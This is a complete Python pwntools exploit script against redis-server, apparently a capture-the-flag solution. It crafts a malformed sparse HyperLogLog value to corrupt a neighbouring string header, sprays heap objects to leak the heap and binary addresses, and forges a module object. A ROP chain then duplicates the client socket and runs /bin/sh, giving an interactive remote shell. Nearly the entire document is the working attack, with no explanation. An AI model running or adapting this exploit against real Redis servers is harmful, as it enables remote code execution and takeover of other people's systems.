#!/usr/bin/env python3

from pwn import *
import redis
import random
import string

HOST, PORT = 'localhost', 6379

binary = ELF('./redis-server')

# client to send redis commands
r = redis.Redis(HOST, PORT)

# client to pop shell
p = remote(HOST, PORT)
p.sendline('client info')
p.recvuntil('fd=')
fd = int(p.recvline().split()[0])
log.info(f'{fd = }')

HLL_DENSE = 0
HLL_SPARSE = 1
HLL_DENSE_SIZE = 0x3010

# make a dense hll, which is just a string with specific encodings
pl = b'HYLL'
pl += p8(HLL_DENSE)
pl = pl.ljust(HLL_DENSE_SIZE, p8(0))
r.set('hll:dense', pl)
# assert that the hll encoding is valid
r.pfadd('hll:dense')

# make a malformed sparse hll, again just a string
def xzero(sz):
  assert 1 <= sz <= 0x4000
  sz -= 1
  return p8(0b01_000000 | (sz >> 8)) + p8(sz & 0xff)

pl = b'HYLL'
pl += p8(HLL_SPARSE) + p8(0)*3
pl += p8(0)*8
assert len(pl) == 0x10
pl += xzero(0x4000) * 0x3fffd   # -0xc000
pl += xzero(0xc000 - 0x956c)    # -0x956c, where divmod(-0x956c*6, 8) = (-0x7011, 0)
pl += p8(0b1_00011_00)          # runlen = 1, regval = 4 = SDS_TYPE_64 => -0x956b, overwrite sds:b type
pl += xzero(0x156b)             # -0x8000
pl += xzero(0x4000) * 3         # 0x4000
r.set('hll:exp', pl)

# prep 14KiB sds
fakelen = 0x4142434445464748
r.setrange('sds:a', 0x37fa - 11, p64(fakelen))  # sds @ 0x0005, p64() 00 00 00 00 
r.setrange('sds:b', 0x37fa - 8, b'B'*8)         # sds @ 0x3805, ................. fa 37 fa 37 02 ~
r.setrange('sds:c', 0x37fa - 8, b'C'*8)         # sds @ 0x7005

# trigger hllMerge + hllSparseToDense
# alloc 0x3010 => round 0x3800 (14KiB)
r.pfmerge('hll:exp', 'hll:dense')                           # sds @ 0xa805

# assert that string type is modified
assert r.strlen('sds:b') == fakelen

# spray embstr objects
marker = ''.join(random.choices(string.ascii_letters + string.digits, k=8)).encode()
log.info(f'{marker = }')
spray_cnt = 0x100000 // 0x40
for i in range(spray_cnt // 0x400):   # batch spray with mset
  ms = {}
  for j in range(0x400):
    idx = i * 0x400 + j
    ms[f'sds:_{idx}'] = (marker+p64(idx)).ljust(0x2b, b' ')
  r.mset(ms)

# dump the heap!
dump = r.getrange('sds:b', 0, 0x100000)[3:]

# egghunt valid embstr object
mark = 0x3700
while mark < len(dump):
  mark = dump.find(marker, mark)
  assert mark != -1
  tofs = mark - 3 - 0x10
  # assert type|encoding, refcount, sdshdr8 fields
  if dump[tofs] == 0x80 and u32(dump[tofs+4:tofs+8]) == 0x1 and dump[tofs+0x10:tofs+0x13] == b'\x2b\x2b\x01':
    break
  mark += 8
else:
  assert False, '[!] embstr spray egghunt fail'

# target robj
tadr = u64(dump[tofs+8:tofs+0x10]) - 3 - 0x10
tkey = f'sds:_{u64(dump[tofs+3+0x18:tofs+3+0x20])}'
log.success(f'{tofs = :#x} ({tkey = })')
log.success(f'{tadr = :#014x}')

# sds:b header
badr = tadr - tofs - 8
log.info(f'{badr = :#014x}')

# egghunt redis-server base
egg = binary.sym['je_ehooks_default_extent_hooks'] & 0xfff
for i in range(0x10000 - ((badr + 8) & 0xffff), len(dump), 0x10000):
  if u64(dump[i:i+8]) == 0x200000 and (u64(dump[i+0xc8:i+0xd0]) & 0xfff) == egg and (u64(dump[i+0xd8:i+0xe0]) & 0xfff) == egg:
    binary.address = u64(dump[i+0xc8:i+0xd0]) - binary.sym['je_ehooks_default_extent_hooks']
    break
else:
  assert False, '[!] redis-server base egghunt fail'

assert (binary.address & 0xfff) == 0
log.success(f'{binary.address = :#014x}')

# fake module object
pl = p8(0x05) + dump[tofs+1:tofs+4]   # type, encoding, lru
pl += p32(1)                          # refcount
pl += p64(badr + 0x10)                # ptr
r.setrange('sds:b', tofs+3, pl)

'''
0x001b9991: mov rax, rdi; mov rsi, [rdi+8]; mov rdi, [rdi]; mov rbp, rsp; call qword ptr [rax+0x10];
0x00226097: mov rbp, rdi; mov esi, 0x10; mov edi, 1; call qword ptr [rax+8];
0x001410ec: leave; ret;
0x002d6706: pop rdi; ret;
0x002d5cfb: pop rsi; ret;
0x000fc472: pop rdx; ret;
'''

# fake module value (badr + 0x10)
B = binary.address
PRDI = B+0x002d6706
PRSI = B+0x002d5cfb
PRDX = B+0x000fc472

# badr + 0x10
pl = p64(badr + 0x20 - 7*8)   # mv->type
pl += p64(badr + 0x2010)      # mv->value      (rdi)
pl += p64(B + 0x001b9991)     # mv->type->free (rip), gadget #0
pl = pl.ljust(0x1000, b'\0')

# badr + 0x1010
pl += b'/bin/sh\0'            # 0x1010
pl += p64(badr + 0x1010)      # 0x1018
pl += p64(0)                  # 0x1020
pl = pl.ljust(0x2000, b'\0')

# badr + 0x2010 (=rdi)
pl += p64(badr + 0x2028)      # [rdi], rbp to set
pl += p64(B + 0x001410ec)     # [rax+8], gadget #2
pl += p64(B + 0x00226097)     # [rax+8], gadget #1
pl += p64(0)                  # popped rbp

# ret, ROP starts here
# FD_CLOEXEC is dropped on dup2 newfd
pl += p64(PRDI) + p64(fd) + p64(PRSI) + p64(0) + p64(binary.plt['dup2'])
pl += p64(PRDI) + p64(fd) + p64(PRSI) + p64(1) + p64(binary.plt['dup2'])
pl += p64(PRDI) + p64(fd) + p64(PRSI) + p64(2) + p64(binary.plt['dup2'])
pl += p64(PRDI) + p64(badr + 0x1010)
pl += p64(PRSI) + p64(badr + 0x1018)
pl += p64(PRDX) + p64(0)
pl += p64(binary.plt['execve'])

r.setrange('sds:b', 3+8, pl)
r.close()
del r

# trigger module free!
p.sendline(f'set {tkey} 0')
p.interactive()